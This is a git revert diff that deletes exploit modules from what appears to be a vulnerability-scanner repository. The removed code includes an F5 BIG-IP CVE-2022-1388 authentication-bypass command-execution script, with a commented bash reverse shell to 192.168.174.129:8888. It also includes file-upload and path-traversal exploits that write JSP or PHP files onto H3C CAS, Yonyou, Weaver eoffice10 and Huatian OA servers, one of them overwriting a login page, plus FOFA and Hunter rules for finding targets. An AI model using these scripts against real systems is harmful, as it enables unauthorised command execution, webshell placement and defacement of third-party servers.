Merge pull request #20 from WingsSec/revert-19-J-D-Q-patch-1

Revert "Add files via upload"

Moudle/F5/CVE-2022-1388.md

@@ -1,27 +0,0 @@
-未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问，执行任意系统命令、创建或删除文件或禁用服务。
-
-# 影响范围
-
-11.6.1 - 11.6.5
-12.1.0 - 12.1.6
-13.1.0 - 13.1.4
-14.1.0 - 14.1.4
-15.1.0 - 15.1.5
-16.1.0 - 16.1.2
-
-# fofa搜索
-
-FOFA_RULE = 'icon_hash="-335242539"'
-
-# 漏洞概要
-
-访问`/mgmt/shared/authn/login`,若返回中带有`resterrorresponse`则可能存在该漏洞。
-
-默认执行whoami。可更换执行其他命令
-
-
-
-`    data = {'command': "run", 'utilCmdArgs': "-c 'whoami'"}`
-
-`# command: bash -i >&/dev/tcp/192.168.174.129/8888 0>&1`
-

Moudle/F5/CVE_2022_1388.py

@@ -1,40 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-from urllib import response
-import requests
-from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = 'CVE-2022-1388'
-AUTHOR = "JDQ"
-REMARK = 'F5  BIG-IP iControl REST 身份验证绕过漏洞'
-FOFA_RULE = 'icon_hash="-335242539"'
-######################################################
-
-headers = {
-    "User-Agent": ua,
-    "Host":"localhost",
-    'Content-Type': 'application/json',
-    'Connection': 'keep-alive, x-F5-Auth-Token',
-    'X-F5-Auth-Token': 'a',
-    'Authorization': 'Basic YWRtaW46'
-}
-
-
-def poc(target):
-    data = {'command': "run", 'utilCmdArgs': "-c 'whoami'"}
-    try:
-        r = requests.post(target+'/mgmt/tm/util/bash', json=data,
-                          headers=headers, verify=False, timeout=5)
-        if r.status_code == 200 and 'commandResult' in r.text:
-            print("[+] 目标 {} 存在漏洞".format(target))
-            print(r.text)
-    except Exception as e:
-        pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")

Moudle/H3c_CAS文件上传/H3c_CAS_fileupload.py

@@ -1,40 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-from urllib import response
-import requests
-from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = 'H3c_CAS_fileupload'
-AUTHOR = "JDQ"
-REMARK = 'cas 云计算管理平台文件上传'
-FOFA_RULE = ''
-######################################################
-
-
-data = r'''<% out.println("helloworld");%>
-'''
-
-
-def poc(target):
-    headers = {
-        "User-Agent": ua,
-        "Content-range": "bytes 0-10/20",
-        'Referer': target+"/cas/"
-    }
-    try:
-        r = requests.post(target+'/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/5.jsp&name=222', data=data,
-                          headers=headers, verify=False, timeout=5)
-        if r.status_code == 200 and 'success' in r.text:
-            r = requests.get(target+'/cas/js/lib/buttons/5.jsp')
-            print("[+] 目标 {} 存在漏洞".format(target), r.text)
-
-    except Exception as e:
-        pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")

Moudle/seeyou/seeyouGRP_U8.py

@@ -1,56 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-from dataclasses import fields
-from email.mime import multipart
-import random
-from urllib import response
-from importlib_metadata import files
-import requests
-from requests_toolbelt import MultipartEncoder
-from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = '用友 GRP-U8 财务管理软件任意文件上传漏洞'
-AUTHOR = "JDQ"
-REMARK = '用友 GRP-U8 财务管理软件任意文件上传漏洞'
-HUNTER_RULE = 'web.icon=="b41be1ccc6f9f2894e0cfcf23acf5fc0"'
-######################################################
-
-# proxies = {
-#     "http": 'http://127.0.0.1:8080',
-#     "https": 'http://127.0.0.1:8080'
-# }
-headers = {
-    "User-Agent": ua
-}
-stra = r'''
-
-<% out.println("helloworld");%>'''
-m = MultipartEncoder(
-    fields={
-        "myFile": ("test.txt", stra),
-    },
-    boundary='---------------------------107161996541389066151862863273'
-)
-headers['Content-Type'] = m.content_type
-
-
-def poc(target):
-
-    try:
-        r = requests.post(target+r'/UploadFileData?action=upload_file&foldername=%2e%2e%2f&filename=2.jsp', headers=headers, data=m,  # proxies=proxies,
-                          verify=False, timeout=5,)
-        if r.status_code == 200:
-            r = requests.get(
-                target+"/R9iPortal/2.jsp")
-            print("[+] 目标 {} 存在漏洞".format(target), r.text)
-
-    except Exception as e:
-        pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")

Moudle/seeyou/seeyou_UFIDA_fileupload.py

@@ -1,41 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-import re
-from urllib import response
-import requests
-#from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = 'seeyou_UFIDA_fileupload'
-AUTHOR = "JDQ"
-REMARK = 'FIDA用友时空KSOA软件前台文件上传漏洞'
-FOFA_RULE = 'app="用友-时空KSOA"'
-######################################################
-
-headers = {
-    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36",
-}
-data = '''
-<% out.println("helloworld"); %>
-
-
-'''
-
-
-def poc(target):
-    try:
-        r = requests.post(target+'/servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=111.jsp',data=data,
-                          headers=headers, verify=False, timeout=5)
-        if r.status_code == 200:
-            print("[+] 目标 {} 存在漏洞".format(target)+r.text)
-            print(r.text)
-
-    except Exception as e:
-        pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")

Moudle/weaver/eoffice10_fileupload.py

@@ -1,65 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-from urllib import response
-import requests
-from requests_toolbelt import MultipartEncoder
-from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = 'eoffice10_upload'
-AUTHOR = "JDQ"
-REMARK = '泛微 eoffice10 文件上传漏洞'
-FOFA_RULE = ''
-######################################################
-
-headers = {
-    "User-Agent": ua
-}
-
-
-# stra = '''
-
-# <?php
-# echo "helloworld";
-# ?>
-# '''
-# m = MultipartEncoder(
-#     fields={
-#         "FileData": ("nonono.php", stra),
-#         "FormData": (None, str({'USERNAME': 'admin', 'RECORDID': 'undefined', 'OPTION': 'SAVEFILE', 'FILENAME': '1.php'}))
-#     },
-#     boundary='----WebKitFormBoundaryLpoiBFy4ANA8daew'
-# )
-# headers['Content-Type'] = m.content_type
-
-
-def poc(target):
-    try:
-        r = requests.get(target+'/eoffice10/server/public/iWebOffice2015/OfficeServer.php',
-                         headers=headers, verify=False, timeout=5)
-        if r.status_code == 200 and r.headers['Content-Length'] == "0":
-            print("[+] 目标 {} 存在漏洞".format(target))
-
-    except Exception as e:
-        pass
-
-
-# def poc(target):
-#     try:
-#         r = requests.post(
-#             target+'/eoffice10/server/public/iWebOffice2015/OfficeServer.php',
-#             headers=headers, data=m, verify=False, timeout=5)
-#         if r.status_code == 200:
-#             r = requests.get(
-#                 target+'/eoffice10/server/public/iWebOffice2015/Document/1.php', headers=headers, verify=False, timeout=5)
-#             print("[+] 目标 {} 存在漏洞".format(target), r.text)
-
-#     except Exception as e:
-#         pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")

Moudle/华天动力OA/huatianOA.py

@@ -1,58 +0,0 @@
-#!/usr/bin/env python3
-# _*_ coding:utf-8 _*_
-
-from dataclasses import fields
-from email.mime import multipart
-import random
-from urllib import response
-from importlib_metadata import files
-import requests
-from requests_toolbelt import MultipartEncoder
-from Config.config_requests import ua
-
-requests.packages.urllib3.disable_warnings()
-# 脚本信息
-######################################################
-NAME = '华天动力协同oa系统文件上传'
-AUTHOR = "JDQ"
-REMARK = '华天动力协同oa系统文件上传'
-HUNTER_RULE = 'web.icon=="b7093d421dbebf3fdd76545d4457673a"'
-######################################################
-
-# proxies = {
-#     "http": 'http://127.0.0.1:8080',
-#     "https": 'http://127.0.0.1:8080'
-# }
-headers = {
-    "User-Agent": ua
-}
-stra = r'''
-
-<% out.println("helloworld");%>'''
-m = MultipartEncoder(
-    fields={
-        "EDITFILE": ("test.txt", stra),
-        "newFileName": (None, r"f:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp")
-    },
-    boundary='---------------------------107161996541389066151862863273'
-)
-headers['Content-Type'] = m.content_type
-
-
-def poc(target):
-
-    try:
-        r = requests.post(target+'/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp', headers=headers, data=m,  # proxies=proxies,
-                          verify=False, timeout=5,)
-        if r.status_code == 200:
-            r = requests.get(
-                target+"/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp")
-            print(r.text)
-            print("[+] 目标 {} 存在漏洞".format(target))
-
-    except Exception as e:
-        pass
-
-
-if __name__ == '__main__':
-    poc("http://127.0.0.1")